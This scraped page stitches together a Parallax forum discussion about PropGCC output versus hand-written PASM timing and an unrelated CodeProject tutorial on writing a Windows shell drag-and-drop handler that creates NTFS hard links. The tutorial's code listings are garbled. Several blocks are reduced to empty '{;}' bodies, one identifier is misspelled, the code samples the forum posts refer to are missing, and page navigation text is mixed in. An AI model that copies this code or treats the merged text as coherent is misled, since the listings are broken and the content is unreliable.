bitbangs a 6502 at 1MHz; that gives me only 20 non-hub PASM instructions per 6502 clock cycle to do the work. Even a single unnecessary instruction generated by the C compiler might make the code not meet its timing requirements. I was hoping to read a comment saying "Oh, <insert name> is working on GCC/gas and made a lot of improvements <so many months> ago, it should all work now!" so I'm a bit disappointed but not terribly surprised about the answers. It's good that some developers such as Roy are still seriously maintaining things and it's a shame (but understandable) that minor problems aren't getting fixed because of internal priorities at Parallax. Anyway, eventually I want to try and explain how things in my project work by using C. And I'll use either SimpleIDE or PropWare (I haven't had a chance to try that yet) to do that. It'll just run slower than the Assembly code. I think my target audience would be willing to read the Assembly source code and they would understand it if they already know what the corresponding C code looks like. But I don't want to ask readers to take a jump from "This is how it works in C" to "This is how it works in assembler and oh by the way you have to convert the higher level stuff from C to Spin to make the PASM parts work". That would just be silly. So I'll probably have to deal with whatever incompatibilities are left in gas. Or now that it's in Github, I might fork GCC/binutils/gas to make it work the way I think it's supposed to. Maybe I can even convince some people that my ideas in that old thread were not so bad after all. At this time, I'm not yet angry enough at the mess to attack it :-) ===Jac Here's an example of what "modern" PropGCC will do when combined with (good) C++: My C++ example for blinking a GPIO (docs on this example here:) And the generated assembly: That's exactly what I mean with "too much juggling". Your constructor code for the Pin class probably just has something similar to "DIRA |= 1 << pinnum;" In assembler, I would just write this as: That is a 4x speed up, and saves 3 longs. Or a 5x speed up if you count the extra instruction that the compiler generates because it somehow thinks it's a good idea to get ahead of itself. And actually it's worse than that because you're compiling in LMM mode. I have great respect and admiration for the engineers that made gcc work for the Propeller. But there is a lot of room for improvement. ===Jac When PropGCC was first implemented we had the COG and LMM models. The hub memory issue became a major problem, so the XMM and XMMC models were added. Finally, the CMM model was added, which uses about the same amount of memory as Spin, and typically runs slightly faster. The P2 should be a joy to program in C or C++. With 512K of hub RAM we won't have to struggle so much with running out of memory. This code is used for both ports (multi pin, not consecutive) and individual pins. You'll notice the part where performance matters - the toggle - is nice and fast.: Absolutely. And in those scenarios, PropWare::Pin::set_direction would not be appropriate. But of course there are many ways to solve that problem with PropGCC as the build tool of choice: What's not to like here. Mike Thanks! I'm working on documentation this weekend. ===Jac C may be faster than Spin but Assembler is even faster. As I already mentioned, some of my code has to do its job in loops that take 1 microsecond. That usually comes down to about 15 or 16 regular instructions, plus one or two waitpxx instructions, plus one hub instruction. That leaves me no playing room to let the C compiler insert instructions like it does in that code fragment above. Therefore I said: C is great but could be greater, and for at least some parts of my software it's simply not good enough. ===Jac
https://forums.parallax.com/discussion/168321/migrating-from-propeller-tool-to-propelleride-or-simpleide
CC-MAIN-2019-39
refinedweb
3,069
72.36
In Parts I and II of the Guide, I showed how to write context menu extensions that are invoked when the user right-clicks on certain types of files. In this part, I'll demonstrate a different type of context menu extension, the drag and drop handler, which adds items to the context menu displayed for a right-button drag and drop operation. I'll also give more examples of using MFC in an extension. Part IV assumes that you understand the basics of shell extensions, and are familiar with MFC. This particular extension is a real utility that creates hard links on Windows 2000 and later, but you can still follow along even if you are using an older version of Windows. As every power user knows (and few normal users know), you can drag and drop items in Explorer using the right mouse button. When you release the button, Explorer shows a context menu that lists all the available actions you can take. Normally, these are move, copy, and create shortcut: Explorer lets us add items to this menu, by using a drag and drop handler. This type of extension is invoked when any right-drag and drop operation happens, and the extension can add menu items if it deems it should. An example of a drag and drop handler is in WinZip. Here's what WinZip adds to the context menu when you right-drag a compressed file: WinZip's extension is invoked for any right-drag and drop operation, but it only adds it menu items if a compressed file is being dragged. This article's sample extension will use an API added in Windows 2000, CreateHardLink(), to make hard links to files on NTFS volumes. We'll add an item for making links to the context menu, so the user can make hard links the same way as regular shortcuts. Remember that VC 7 (and probably VC 8) users will need to change some settings before compiling. See the README section in Part I for the details. Run the AppWizard and make a new ATL COM app. We'll call it HardLink. We are going to use MFC, so check the Support MFC checkbox, and then click Finish. To add a COM object to the DLL, go to the ClassView tree, right-click the HardLink classes item, and pick New ATL Object. (In VC 7, right-click the item and pick Add|Add Class.) As before, choose Simple Object in the wizard, and use the name HardLinkShlExt for the object. This will create a C++ class CHardLinkShlExt that will implement the extension. As with our earlier context menu extensions, Explorer initializes us using the IShellExtInit interface. We first need to add IShellExtInit to the list of interfaces that CHardLinkShlExt implements. Open HardLinkShlExt.h, and add the lines listed here in bold: #include <comdef.h> #include <shlobj.h> class CHardLinkShlExt : public CComObjectRootEx<CComSingleThreadModel>, public CComCoClass<CHardLinkShlExt, &CLSID_HarkLinkShlExt>, public IShellExtInit { BEGIN_COM_MAP(CHardLinkShlExt) COM_INTERFACE_ENTRY(IShellExtInit) END_COM_MAP() public: // IShellExtInit STDMETHODIMP Initialize(LPCITEMIDLIST, LPDATAOBJECT, HKEY); We'll also need some variables to hold a bitmap and the names of the files being dragged: protected: CBitmap m_bitmap; TCHAR m_szFolderDroppedIn[MAX_PATH]; CStringList m_lsDroppedFiles; Also, we'll need to add a some #defines to stdafx.h to make the CreateHardLink() and shlwapi.dll function prototypes visible: #define WINVER 0x0500 #define _WIN32_WINNT 0x0500 #define _WIN32_IE 0x0400 Defining WINVER as 0x0500 enables features specific to Win 98 and 2000, and defining _WIN32_WINNT as 0x0500 enables NT features specific to Win 2000. Defining _WIN32_IE as 0x0400 enables features introduced with IE 4. Now, on to the Initialize() method. This time, I'll show how to use MFC to access the list of files being dragged. MFC has a class, COleDataObject, that wraps the IDataObject interface. Previously, we had to call IDataObject methods directly. But fortunately, MFC makes the job a bit easier for us. Here's the prototype for Initialize(), to refresh your memory: HRESULT IShellExtInit::Initialize ( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hProgID ); For drag and drop extensions, pidlFolder is the PIDL of the folder where the items were dropped. (I'll have more to say about the PIDL later.) pDataObj is an IDataObject interface with which we can enumerate all of the items that were dropped. hProgID is an open HKEY on our shell extension's key under HKEY_CLASSES_ROOT. Our first step is to load a bitmap for our menu item. Then, we attach a COleDataObject variable to the IDataObject interface. HRESULT CHardLinkShlExt::Initialize ( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hProgID ) { AFX_MANAGE_STATE(AfxGetStaticModuleState()); // init MFC COleDataObject dataobj; HGLOBAL hglobal; HDROP hdrop; TCHAR szRoot[MAX_PATH]; TCHAR szFileSystemName[256]; TCHAR szFile[MAX_PATH]; UINT uFile, uNumFiles; m_bitmap.LoadBitmap ( IDB_LINKBITMAP ); dataobj.Attach ( pDataObj, FALSE ); Passing FALSE as the second parameter to Attach() means to not release the IDataObject interface when the dataobj variable is destructed. The next step is to get the directory where the items were dropped. We have the PIDL of this directory, but how do we get the path? Time for a little sidebar... "PIDL" is an acronym for pointer to an ID list. A PIDL is a way of uniquely identifying any object within the hierarchy presented by Explorer. Every object in the shell, whether it's part of the file system or not, has a PIDL. The exact structure of a PIDL depends on where the object is, but unless you are writing your own namespace extension, you don't (and shouldn't) have to worry about the internal structure of a PIDL. For our purposes, we can use the shell API SHGetPathFromIDList() to translate the PIDL into a conventional path. If the target folder isn't a directory in the file system (for example, the Control Panel), SHGetPathFromIDList() will fail and we can bail out. if ( !SHGetPathFromIDList(pidlFolder, m_szFolderDroppedIn) ) return E_FAIL; Next, we have to check if the target directory is on an NTFS volume. We get the root component of the path (for example, E:\), and get the info about that volume. If the file system is not NTFS, we can't make any links, so we can return. lstrcpy ( szRoot, m_szFolderDroppedIn ); PathStripToRoot ( szRoot ); if ( !GetVolumeInformation ( szRoot, NULL, 0, NULL, NULL, NULL, szFileSystemName, 256 )) { // Couldn't determine file system type. return E_FAIL; } if ( 0 != lstrcmpi ( szFileSystemName, _T("ntfs") )) { // The file system isn't NTFS, so it doesn't support hard links. return E_FAIL; } Next, we get an HDROP handle from the data object, which we'll use to enumerate the files that were dropped. This is similar to the method in Part III, except we're using the MFC class to access the data. COleDataObject handles setting up the FORMATETC and STGMEDIUM structs for us. hglobal = dataobj.GetGlobalData ( CF_HDROP ); if ( NULL == hglobal ) return E_INVALIDARG; hdrop = (HDROP) GlobalLock ( hglobal ); if ( NULL == hdrop ) return E_INVALIDARG; We then use the HDROP handle to enumerate the dropped files. For each one, we check if it is a directory. Directories cannot be linked to, so if we find a directory, we can return. uNumFiles = DragQueryFile ( hdrop, 0xFFFFFFFF, NULL, 0 ); for ( uFile = 0; uFile < uNumFiles; uFile++ ) { if ( DragQueryFile ( hdrop, uFile, szFile, MAX_PATH ) ) { if ( PathIsDirectory ( szFile ) ) { // We found a directory! Bail out. m_lsDroppedFiles.RemoveAll(); break; } We also have to check that the dropped files reside on the same volume as the target directory. What I did was compare the root components of each file and the target directory, and return if they are different. This is not a complete solution, though, since on NTFS volumes, you can mount a volume in the middle of another. For example, you could have a C: volume, and mount another volume as C:\dev. This code will not reject an attempt to make a link from C:\dev to somewhere else on C:. Here's the check that compares the root components: if ( !PathIsSameRoot(szFile, m_szFolderDroppedIn) ) { // Dropped files came from a different volume - bail out. m_lsDroppedFiles.RemoveAll(); break; } If the file passes both checks, we add it to m_lsDroppedFiles, which is a CStringList (linked list of CStrings). // Add the file to our list of dropped files. m_lsDroppedFiles.AddTail ( szFile ); } } // end for After the for loop, we release resources and return back to Explorer. If the string list contains any filenames, we return S_OK to indicate we need to modify the context menu. Otherwise, we return E_FAIL so that we won't be called again for this drag and drop event. GlobalUnlock ( hglobal ); return (m_lsDroppedFiles.GetCount() > 0) ? S_OK : E_FAIL; } Like other context menu extensions, a drag and drop handler implements the IContextMenu interface with which it interacts with the context menu. To add IContextMenu to our extension, open HardLinkShlExt.h again and add the lines listed in bold: class CHardLinkShlExt : public CComObjectRootEx<CComSingleThreadModel>, public CComCoClass<CHardLinkShlExt, &CLSID_HardLinkShlExt>, public IShellExtInit, public IContextMenu { BEGIN_COM_MAP(CHardLinkShlExt) COM_INTERFACE_ENTRY(IShellExtInit) COM_INTERFACE_ENTRY(IContextMenu) END_COM_MAP() public: // IContextMenu STDMETHODIMP GetCommandString(UINT, UINT, UINT*, LPSTR, UINT) { return E_NOTIMPL; } STDMETHODIMP InvokeCommand(LPCMINVOKECOMMANDINFO); STDMETHODIMP QueryContextMenu(HMENU, UINT, UINT, UINT, UINT); Note that we don't need any code in GetCommandString(), because that method is not called in drag and drop handlers. Explorer calls our QueryContextMenu() function to let us modify the context menu. There's nothing here you haven't seen before; we just add one menu item and set its bitmap. HRESULT CHardLinkShlExt::QueryContextMenu ( HMENU hmenu, UINT uMenuIndex, UINT uidFirstCmd, UINT uidLastCmd, UINT uFlags ) { AFX_MANAGE_STATE(AfxGetStaticModuleState()); // init MFC // If the flags include CMF_DEFAULTONLY then we shouldn't do anything. if ( uFlags & CMF_DEFAULTONLY ) return MAKE_HRESULT ( SEVERITY_SUCCESS, FACILITY_NULL, 0 ); // Add the hard link menu item. InsertMenu ( hmenu, uMenuIndex, MF_STRING | MF_BYPOSITION, uidFirstCmd, _T("Create hard link(s) here") ); if ( NULL != m_bitmap.GetSafeHandle() ) { SetMenuItemBitmaps ( hmenu, uMenuIndex, MF_BYPOSITION, (HBITMAP) m_bitmap.GetSafeHandle(), NULL ); } // Return 1 to tell the shell that we added 1 top-level menu item. return MAKE_HRESULT(SEVERITY_SUCCESS, FACILITY_NULL, 1); } Here's what the new menu item looks like: Explorer calls InvokeCommand() when the user clicks our menu item. We'll create links to all the files that were dropped. The names of the links will be "Hard link to <filename>", or, if that name is already in use, "Hard link (2) to <filename>". The number will go up to 99, an arbitrary limit. First, the locals and a check of the lpVerb parameter, which must be 0 since we only have 1 menu item. HRESULT CHardLinkShlExt::InvokeCommand ( LPCMINVOKECOMMANDINFO pInfo ) { AFX_MANAGE_STATE(AfxGetStaticModuleState()); // init MFC TCHAR szNewFilename[MAX_PATH+32]; CString sSrcFile; TCHAR szSrcFileTitle[MAX_PATH]; CString sMessage; UINT uLinkNum; POSITION pos; // Double-check that we're getting called for our own menu item - lpVerb // must be 0. if ( 0 != pInfo->lpVerb ) return E_INVALIDARG; Next, we get a POSITION value pointing at the beginning of the string list. A POSITION is an opaque data type which you don't use directly, but instead you pass it to other methods of the CStringList class. To get the POSITION of the head of the list, we call GetHeadPosition(): pos = m_lsDroppedFiles.GetHeadPosition(); ASSERT ( NULL != pos ); pos will be NULL if the list is empty, but the list shouldn't be empty, ever, so I added an ASSERT to check for that case. Next up is the beginning of the loop that will iterate through the filenames in the list and make a link to each one. while ( NULL != pos ) { // Get the next source filename. sSrcFile = m_lsDroppedFiles.GetNext ( pos ); // Remove the path - this reduces "C:\xyz\foo\stuff.exe" to "stuff.exe" lstrcpy ( szSrcFileTitle, sSrcFile ); PathStripPath ( szSrcFileTitle ); // Make the filename for the hard link - we'll first try // "Hard link to stuff.exe" wsprintf ( szNewFilename, _T("%sHard link to %s"), m_szFolderDroppedIn, szSrcFileTitle ); GetNext() returns the CString at the position indicated by pos, and increments pos to point at the next string. If pos was at the end of the list, pos becomes NULL (so that's how the while loop will end). At this point, szNewFilename holds the full path of the hard link. We check if a file with this name exists, and if so, we'll try adding numbers 2 through 99, looking for a name that's not already in use. We also make sure the length of the link name (including the terminating null) doesn't exceed MAX_PATH characters. for ( uLinkNum = 2; PathFileExists(szNewFilename) && uLinkNum < 100; uLinkNum++ ) { // Try another filename for the link. wsprintf ( szNewFilename, _T("%sHard link (%u) to %s"), m_szFolderDroppedIn, uLinkNum, szSrcFileTitle ); // If the resulting filename is longer than MAX_PATH, show an // error message. if ( lstrlen(szNewFilename) >= MAX_PATH ) {; } } // end for The message box lets you abort the entire operation if you want. Next, we check to see if we hit the limit of 99 links. Again, we let the user abort the whole operation. if ( 100 == uLinkNum ) {; } All that's left is to make the hard link. I've omitted the error handling code for clarity. CreateHardLink ( szNewFilename, sSrcFile, NULL ); } // end while return S_OK; } The hard link doesn't look any different in Explorer, it just looks like any other ordinary file. But if you modify one copy, the changes will be reflected in the other copy. Registering a drag and drop handler is simpler than other context menu extensions. All handlers are registered under the HKCR\Directory key, since that's where the drop happens, in a directory. However, what the docs don't say is that registering under HKCR\Directory isn't enough to handle all cases. You also need to register under HKCR\Folder to handle drops on the desktop, and HKCR\Drive to handle drops in root directories. Here is the RGS script to handle all three of the above situations: HKCR { NoRemove Directory { NoRemove shellex { NoRemove DragDropHandlers { ForceRemove HardLinkShlExt = s '{3C06DFAE-062F-11D4-8D3B-919D46C1CE19}' } } } NoRemove Folder { NoRemove shellex { NoRemove DragDropHandlers { ForceRemove HardLinkShlExt = s '{3C06DFAE-062F-11D4-8D3B-919D46C1CE19}' } } } NoRemove Drive { NoRemove shellex { NoRemove DragDropHandlers { ForceRemove HardLinkShlExt = s '{3C06DFAE-062F-11D4-8D3B-919D46C1CE19}' } } } } As with our previous extensions, on NT-based OSes, we need to add our extension to the list of "approved" extensions. The code to do this is in the DllRegisterServer() and DllUnregisterServer() functions in the sample project. You can still build and run the sample project on earlier versions of Windows, or if you don't have an NTFS volume available. Just open the stdafx.h file, and uncomment the line that reads: // #define NOT_ON_WIN2K That will make the extension skip the file system check (so it will run on anything, not just NTFS), and display message boxes instead of actually making links. Coming up in Part V, we'll see a new type of extension, the property sheet handler, which adds pages to the properties dialog for files.. April 3, 2000: Article first published. June 6, 2000: Something updated. ;) May 24, 2006: Updated to cover changes in VC 7.1, cleaned up code snippets. Series Navigation: « Part III | Part V » General News Question Answer Joke Rant Admin
http://www.codeproject.com/KB/shell/shellextguide4.aspx
crawl-002
refinedweb
2,456
62.48
This article has been updated - Migrating a WPF App in .NET Core 3.0 The first .NET Core 3.0 Preview was released a couple of weeks ago,. While the preview is still in an early state and missing a few key features (such as designer support), you can already start using it to develop new apps or migrate existing ones. In this article, we’ll look at both creating a new WPF project from scratch using .NET Core 3.0 as well as migrating an existing WPF project. Creating a new .NET Core 3.0 application To create a new .NET Core 3.0 application I’d first recommend downloading the VS 2019 Preview. Create a new Visual Studio project - Goto: File - New -> Project… - Choose WPF App (.NET Core) then click next Input the project name then click on Create. Finally, we can run the project to make sure that it works: dotnet run Now that the project has been created, we can use Visual Studio to open it and modify its contents. In the File Explorer, open the csproj file using Visual Studio 2019 for the project that we just created. An important note: We were unable to get this to work using the present version of Visual Studio 2017 15.9.3. Be sure to use the Visual Studio 2019 preview. You should see something like this in Visual Studio: .NET Core 3.0 uses both a new project type and has no design-time support currently, so the process of adding controls will be a little different than what you may be accustomed to. We need to add C1 libraries manually to the project to make use of them, so right click on dependencies and click -- Add Reference. The C1 WPF libraries are installed into: Program Files (x86)\ComponentOne\WPF Edition\bin\v4\ You should be able to add them by browsing to that location. For this example, we’ll add a linear gauge to our page, and we’ll need to add C1.WPF.4.dll and C1.WPF.Gauge.4.dll. With the libraries added, we’ll need to add the ComponentOne namespace to our MainWindow.xaml file to work with the control: xmlns:c1="" After the namespace is added we can manipulate the control in XAML. To add a linear gauge you can use the following: <c1:C1LinearGauge You should be able to run the code at this point, though you’ll notice a ComponentOne nag screen since the project doesn’t contain any licensing information. We can correct this by adding a licenses.licx file to the project. To do so, right-click on your project and select Add -> New Items. From here, you’ll need to create a Text File and name it licenses.licx: Once you click add, be sure to check the properties for licenses.licx file and make sure the Build Action is set to Embedded resource. You’ll also need to add a line for each control that needs to be licensed into your licenses.licx file. In this simple linear gauge example, we’d need to add this: C1.WPF.Gauge.C1LinearGauge, C1.WPF.Gauge.4 It may help to compare with an existing project when you add this information to the licenses.licx since it is very much a manual process right now (when using .NET Core 3.0). Build and rerun the app and you should no longer see a nag screen. is able the Visual Studio Command Prompt with the same name as the project that you want to migrate. For this example, we’ll work with FlexGrid101. First, we’ll create a new FlexGrid101 project from the command line: dotnet new wpf -o FlexGrid101 Once this is finished, we’ll navigate into the project directory: cd FlexGrid101 I’d also recommend adding the Windows Compatibility package: dotnet add package Microsoft.Windows.Compatibility Next, open the FlexGrid101.csproj file for the project you’ve created inside of Visual Studio 2019. You’ll see something similar to this: We need to replicate the structure of the existing FlexGrid101 project, so we’ll need to add similar folders, files, and assemblies to the project. We’ll start by adding the same assemblies. FlexGrid101 requires. You can right-click on Dependencies and then choose Add Reference (to select these libraries and add them to the project). The C1 WPF libraries are installed into: Program Files (x86)\ComponentOne\WPF Edition\bin\v4\ Now, we need to add some folders to this project so that it mirrors the structure of the older one. Right-click on the project, then choose Add -> New Folder: We need to add the following folders: CellFactory, Data, Images, Properties, Resources, Themes, View, and ViewModel. The next step is to add files into these folders in the new project from the old one. To do this, you can right-click on a folder and select Add -> Existing Item. Navigate to the existing FlexGrid101 project (which is typically installed to Documents\ComponentOne Samples\WPF\C1.WPF.FlexGrid\CS\FlexGrid101) and add all of the files for each folder. Be careful to select All Files rather than just VS specific files so everything is added correctly (including images, XAML files, etc.). Also, you’ll need to copy the contents of the MainWindow.xaml and MainWindow.xaml.cs from the older project to the new. You can either delete the generated one in the new project and then add the existing one from the old project to it, or you can copy and paste the contents of both files (either will work fine here). We’ll also need to a make a small change to the csproj file to use the AssemblyInfo.cs files that we copied from the Properties folder of the old project to the new one. Right-click on your project and choose the Unload Project options. Right-click it again and choose Edit FlexGrid101.csproj. Within the PropertyGroup node add this line: <Generateassemblyinfo>False</Generateassemblyinfo> Save your changes, and right-click the project again and choose Reload Project. Finally, we need to be sure that certain file types are included into the project correctly by setting the Build Action.. At this point, you should be able to build and run the project. !
https://www.grapecity.com/blogs/using-the-dot-net-core-3-0-preview-with-wpf
CC-MAIN-2019-39
refinedweb
1,049
73.98
I'm having a problem whereby I create an instance of a class called Calculations.class in one of my main classes, but cannot access that instance from any other class. Here is the code public class Parameters{ //code// Calculations calc = new Calculations(); //some calculations done using variables in the calculations class and new data is saved// //end of Parameters.class// } public class Intake{ // I now want to work with the instance "calc" created above so I can use the variables that were set in Parameters.class, but I don't know how to reference this instance!! // Any help will be greatly appreciated, thank you!!
https://www.daniweb.com/programming/software-development/threads/14419/problems-accessing-class-instances
CC-MAIN-2017-47
refinedweb
105
54.52
!30324 38 2013/03/24 23:58:0730324 49 + build-fix for libtool configuration (reports by Daniel Silva Ferreira 50 and Roumen Petrov). 51 52 20130323 53 + build-fix for OS X, to handle changes for --with-cxx-shared feature 54 (report by Christian Ebert). 55 + change initialization for vt220, similar entries for consistency 56 with cursor-key strings (NetBSD #47674) -TD 57 + further improvements to linux-16color (Benjamin Sittler) 58 59 20130316 60 + additional fix for tic.c, to allocate missing buffer space. 61 + eliminate configure-script warnings for gen-pkgconfig.in 62 + correct typo in sgr string for sun-color, 63 add bold for consistency with sgr, 64 change smso for consistency with sgr -TD 65 + correct typo in sgr string for terminator -TD 66 + add blink to the attributes masked by ncv in linux-16color (report 67 by Benjamin Sittler) 68 + improve warning message from post-load checking for missing "%?" 69 operator by tic/infocmp by showing the entry name and capability. 70 + minor formatting improvement to tic/infocmp -f option to ensure 71 line split after "%;". 72 + amend scripting for --with-cxx-shared option to handle the debug 73 library "libncurses++_g.a" (report by Sven Joachim). 74 75 20130309 76 + amend change to toe.c for reading from /dev/zero, to ensure that 77 there is a buffer for the temporary filename (cf: 20120324). 78 + regenerated html manpages. 79 + fix typo in terminfo.head (report by Sven Joachim, cf: 20130302). 80 + updated some autoconf macros: 81 + CF_ACVERSION_CHECK, from byacc 1.9 20130304 82 + CF_INTEL_COMPILER, CF_XOPEN_SOURCE from luit 2.0-20130217 83 + add configure option --with-cxx-shared to permit building 84 libncurses++ as a shared library when using g++, e.g., the same 85 limitations as libtool but better integrated with the usual build 86 configuration (Redhat #911540). 87 + modify MKkey_defs.sh to filter out build-path which was unnecessarily 88 shown in curses.h (Debian #689131). 89 90 20130302 91 + add section to terminfo manpage discussing user-defined capabilities. 92 + update manpage description of NCURSES_NO_SETBUF, explaining why it 93 is obsolete. 94 + add a check in waddch_nosync() to ensure that tab characters are 95 treated as control characters; some broken locales claim they are 96 printable. 97 + add some traces to the Windows console driver. 98 + initialize a temporary array in _nc_mbtowc, needed for some cases 99 of raw input in MinGW port. 100 101 20130218 102 + correct ifdef on change to lib_twait.c (report by Werner Fink). 103 + update config.guess, config.sub 104 105 20130216 106 + modify test/testcurs.c to work with mouse for ncurses as it does for 107 pdcurses. 108 + modify test/knight.c to work with mouse for pdcurses as it does for 109 ncurses. 110 + modify internal recursion in wgetch() which handles cooked mode to 111 check if the call to wgetnstr() returned an error. This can happen 112 when both nocbreak() and nodelay() are set, for instance (report by 113 Nils Christopher Brause) (cf: 960418). 114 + fixes for issues found by Coverity: 115 + add a check for valid position in ClearToEOS() 116 + fix in lib_twait.c when --enable-wgetch-events is used, pointer 117 use after free. 118 + improve a limit-check in make_hash.c 119 + fix a memory leak in hashed_db.c 120 121 20130209 122 + modify test/configure script to make it simpler to override names 123 of curses-related libraries, to help with linking with pdcurses in 124 mingw environment. 125 + if the --with-terminfo-dirs configure option is not used, there is 126 no corresponding compiled-in value for that. Fill in "no default 127 value" for that part of the manpage substitution. 128 129 20130202 130 + correct initialization in knight.c which let it occasionally make 131 an incorrect move (cf: 20001028). 132 + improve documentation of the terminfo/termcap search path. 133 134 20130126 135 + further fixes to mvcur to pass callback function (cf: 20130112), 136 needed to make test/dots_mvcur work. 137 + reduce calls to SetConsoleActiveScreenBuffer in win_driver.c, to 138 help reduce flicker. 139 + modify configure script to omit "+b" from linker options for very 140 old HP-UX systems (report by Dennis Grevenstein) 141 + add HP-UX workaround for missing EILSEQ on old HP-UX systems (patch 142 by Dennis Grevenstein). 143 + restore memmove/strdup support for antique systems (request by 144 Dennis Grevenstein). 145 + change %l behavior in tparm to push the string length onto the stack 146 rather than saving the formatted length into the output buffer 147 (report by Roy Marples, cf: 980620). 148 149 20130119 150 + fixes for issues found by Coverity: 151 + fix memory leak in safe_sprintf.c 152 + add check for return-value in tty_update.c 153 + correct initialization for -s option in test/view.c 154 + add check for numeric overflow in lib_instr.c 155 + improve error-checking in copywin 156 + add advice in infocmp manpage for termcap users (Debian #698469). 157 + add "-y" option to test/demo_termcap and test/demo_terminfo to 158 demonstrate behavior with/without extended capabilities. 159 + updated termcap manpage to document legacy termcap behavior for 160 matching capability names. 161 + modify name-comparison for tgetstr, etc., to accommodate legacy 162 applications as well as to improve compatbility with BSD 4.2 163 termcap implementations (Debian #698299) (cf: 980725). 164 165 20130112 166 + correct prototype in manpage for vid_puts. 167 + drop ncurses/tty/tty_display.h, ncurses/tty/tty_input.h, since they 168 are unused in the current driver model. 169 + modify mvcur to use stdout except when called within the ncurses 170 library. 171 + modify vidattr and vid_attr to use stdout as documented in manpage. 172 + amend changes made to buffering in 20120825 so that the low-level 173 putp() call uses stdout rather than ncurses' internal buffering. 174 The putp_sp() call does the same, for consistency (Redhat #892674). 175 176 20130105 177 + add "-s" option to test/view.c to allow it to start in single-step 178 mode, reducing size of trace files when it is used for debugging 179 MinGW changes. 180 + revert part of 20121222 change to tinfo_driver.c 181 + add experimental logic in win_driver.c to improve optimization of 182 screen updates. This does not yet work with double-width characters, 183 so it is ifdef'd out for the moment (prompted by report by Erwin 184 Waterlander regarding screen flicker). 185 186 20121229 187 + fix coverity warnings regarding copying into fixed-size buffers. 188 + add throw-declarations in the c++ binding per Coverity warning. 189 + minor changes to new-items for consistent reference to bug-report 190 numbers. 191 192 20121222 193 + add *.dSYM directories to clean-rule in ncurses directory makefile, 194 for Mac OS builds. 195 + add a configure check for gcc option -no-cpp-precomp, which is not 196 available in all Mac OS X configurations (report by Andras Salamon, 197 cf: 20011208). 198 + improve 20021221 workaround for broken acs, handling a case where 199 that ACS_xxx character is not in the acsc string but there is a known 200 wide-character which can be used. 201 202 20121215 203 + fix several warnings from clang 3.1 --analyze, includes correcting 204 a null-pointer check in _nc_mvcur_resume. 205 + correct display of double-width characters with MinGW port (report 206 by Erwin Waterlander). 207 + replace MinGW's wcrtomb(), fixing a problem with _nc_viscbuf 208 > fixes based on Coverity report: 209 + correct coloring in test/bs.c 210 + correct check for 8-bit value in _nc_insert_ch(). 211 + remove dead code in progs/tset.c, test/linedata.h 212 + add null-pointer checks in lib_tracemse.c, panel.priv.h, and some 213 test-programs. 214 215 20121208 216 + modify test/knight.c to show the number of choices possible for 217 each position in automove option, e.g., to allow user to follow 218 Warnsdorff's rule to solve the puzzle. 219 + modify test/hanoi.c to show the minimum number of moves possible for 220 the given number of tiles (prompted by patch by Lucas Gioia). 221 > fixes based on Coverity report: 222 + remove a few redundant checks. 223 + correct logic in test/bs.c, when randomly placing a specific type of 224 ship. 225 + check return value from remove/unlink in tic. 226 + check return value from sscanf in test/ncurses.c 227 + fix a null dereference in c++/cursesw.cc 228 + fix two instances of uninitialized variables when configuring for the 229 terminal driver. 230 + correct scope of variable used in SetSafeOutcWrapper macro. 231 + set umask when calling mkstemp in tic. 232 + initialize wbkgrndset() temporary variable when extended-colors are 233 used. 234 235 20121201 236 + also replace MinGW's wctomb(), fixing a problem with setcchar(). 237 + modify test/view.c to load UTF-8 when built with MinGW by using 238 regular win32 API because the MinGW functions mblen() and mbtowc() 239 do not work. 240 241 20121124 242 + correct order of color initialization versus display in some of the 243 test-programs, e.g., test_addstr.c 244 > fixes based on Coverity report: 245 + delete windows on exit from some of the test-programs. 246 247 20121117 248 > fixes based on Coverity report: 249 + add missing braces around FreeAndNull in two places. 250 + various fixes in test/ncurses.c 251 + improve limit-checks in tinfo/make_hash.c, tinfo/read_entry.c 252 + correct malloc size in progs/infocmp.c 253 + guard against negative array indices in test/knight.c 254 + fix off-by-one limit check in test/color_name.h 255 + add null-pointer check in progs/tabs.c, test/bs.c, test/demo_forms.c, 256 test/inchs.c 257 + fix memory-leak in tinfo/lib_setup.c, progs/toe.c, 258 test/clip_printw.c, test/demo_menus.c 259 + delete unused windows in test/chgat.c, test/clip_printw.c, 260 test/insdelln.c, test/newdemo.c on error-return. 261 262 20121110 263 + modify configure macro CF_INCLUDE_DIRS to put $CPPFLAGS after the 264 local -I include options in case someone has set conflicting -I 265 options in $CPPFLAGS (prompted by patch for ncurses/Makefile.in by 266 Vassili Courzakis). 267 + modify the ncurses*-config scripts to eliminate relative paths from 268 the RPATH_LIST variable, e.g., "../lib" as used in installing shared 269 libraries or executables. 270 271 20121102 272 + realign these related pages: 273 curs_add_wchstr.3x 274 curs_addchstr.3x 275 curs_addstr.3x 276 curs_addwstr.3x 277 and fix a long-ago error in curs_addstr.3x which said that a -1 278 length parameter would only write as much as fit onto one line 279 (report by Reuben Thomas). 280 + remove obsolete fallback _nc_memmove() for memmove()/bcopy(). 281 + remove obsolete fallback _nc_strdup() for strdup(). 282 + cancel any debug-rpm in package/ncurses.spec 283 + reviewed vte-2012, reverted most of the change since it was incorrect 284 based on testing with tack -TD 285 + un-cancel the initc in vte-256color, since this was implemented 286 starting with version 0.20 in 2009 -TD 287 288 20121026 289 + improve malloc/realloc checking (prompted by discussion in Redhat 290 #866989). 291 + add ncurses test-program as "ncurses6" to the rpm- and dpkg-scripts. 292 + updated configure macros CF_GCC_VERSION and CF_WITH_PATHLIST. The 293 first corrects pattern used for Mac OS X's customization of gcc. 294 295 20121017 296 + fix change to _nc_scroll_optimize(), which incorrectly freed memory 297 (Redhat #866989). 298 299 20121013 300 + add vte-2012, gnome-2012, making these the defaults for vte/gnome 301 (patch by Christian Persch). 302 303 20121006 304 + improve CF_GCC_VERSION to work around Debian's customization of gcc 305 --version message. 306 + improve configure macros as done in byacc: 307 + drop 2.13 compatibility; use 2.52.xxxx version only since EMX port 308 has used that for a while. 309 + add 3rd parameter to AC_DEFINE's to allow autoheader to run, i.e., 310 for experimental use. 311 + remove unused configure macros. 312 + modify configure script and makefiles to quiet new autoconf warning 313 for LIBS_TO_MAKE variable. 314 + modify configure script to show $PATH_SEPARATOR variable. 315 + update config.guess, config.sub 316 317 20120922 318 + modify setupterm to set its copy of TERM to "unknown" if configured 319 for the terminal driver and TERM was null or empty. 320 + modify treatment of TERM variable for MinGW port to allow explicit 321 use of the windows console driver by checking if $TERM is set to 322 "#win32con" or an abbreviation of 